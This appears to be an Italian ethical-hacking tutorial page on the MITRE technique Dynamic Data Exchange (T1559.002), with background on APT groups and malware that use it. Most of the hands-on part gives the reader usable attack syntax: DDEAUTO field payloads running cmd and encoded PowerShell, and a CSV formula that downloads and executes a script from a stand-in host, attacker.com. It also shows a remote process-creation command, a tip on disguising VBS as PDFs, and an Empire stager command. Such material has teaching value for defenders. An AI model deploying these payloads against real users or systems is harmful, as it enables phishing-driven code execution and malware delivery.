Scambio Dinamico di Dati: Dynamic Data Exchange (T1559.002)

La tecnica Dynamic Data Exchange rappresenta un protocollo client-server di Windows che permette la comunicazione inter-processo tra applicazioni, sfruttato dagli avversari per eseguire comandi arbitrari. Questo meccanismo, originariamente progettato per collegare dati tra documenti Office, consente transazioni autonome di stringhe, notifiche di cambiamento dati e richieste di esecuzione comandi.

La tecnica si manifesta nella tattica TA0002 (Execution), permettendo agli attaccanti di eseguire codice malevolo attraverso documenti Office apparentemente innocui. Nonostante sia stata superata dal Component Object Model, questa funzionalità rimane attiva in Windows 10 e Microsoft Office 2016 attraverso specifiche chiavi di registro.

L'impatto è significativo: 11 gruppi APT documentati hanno utilizzato questa tecnica, tra cui APT28, FIN7 e Sidewinder. 8 famiglie di malware la sfruttano attivamente, inclusi RTM, POWERSTATS e GravityRAT. La campagna Operation Sharpshooter ha dimostrato l'efficacia di questo vettore contro obiettivi nel settore nucleare, difesa ed energia in Germania, Turchia, Regno Unito e Stati Uniti.

Per comprendere il funzionamento del DDE, iniziamo creando un documento Word malevolo. Il payload si inserisce attraverso la funzione campo di Word utilizzando la sintassi:

{DDEAUTO c:\windows\system32\cmd.exe "/k calc.exe"}

Questo comando avvia la calcolatrice come prova di concetto. Per payload più sofisticati, sostituisci calc.exe con PowerShell encoded:

{DDEAUTO c:\windows\system32\cmd.exe "/k powershell -e [BASE64_ENCODED_PAYLOAD]"}

La tecnica funziona anche in Excel attraverso formule. Crea un file CSV con questa riga: =cmd|'/c powershell.exe -w hidden IEX (New-Object Net.WebClient).DownloadString("http://attacker.com/payload.ps1")'!A1

Quando la vittima apre il CSV in Excel, il comando viene eseguito dopo aver bypassato l'avviso di sicurezza. Per testare l'esecuzione remota via DCOM, utilizza questo comando PowerShell dall'attaccante:

Invoke-CimMethod -ComputerName TARGET -ClassName Win32_Process -MethodName Create -Arguments @{CommandLine="cmd.exe /c [COMANDO]"}

Cobalt Group ha dimostrato l'efficacia di documenti OLE compound contenenti oggetti malevoli. Per replicare questa tecnica, incorpora un oggetto Package in Word che esegue script VBS mascherati da documenti PDF. L'oggetto si attiva al doppio click della vittima.

Nel contesto di phishing avanzato, TA505 ha combinato DDE con tecniche di social engineering. I documenti sembravano fatture o comunicazioni aziendali legittime, aumentando drasticamente il tasso di esecuzione.

Per automatizzare la generazione di documenti DDE malevoli, strumenti come Empire e Metasploit includono moduli specifici. Il comando Empire per generare un launcher DDE:

uselistener http usestager windows/launcher_bat generate

Questo produce un payload che può essere inserito nel campo DDE del documento.

Vuoi diventare un Ethical Hacker ma non sai da dove iniziare?

Scarica la guida gratuita e segui il percorso corretto fin dal primo passo

We use cookies

Utilizziamo i cookie sul nostro sito Web. Alcuni di essi sono essenziali per il funzionamento del sito, mentre altri ci aiutano a migliorare questo sito e l'esperienza dell'utente (cookie di tracciamento). Puoi decidere tu stesso se consentire o meno i cookie. Ti preghiamo di notare che se li rifiuti, potresti non essere in grado di utilizzare tutte le funzionalità del sito.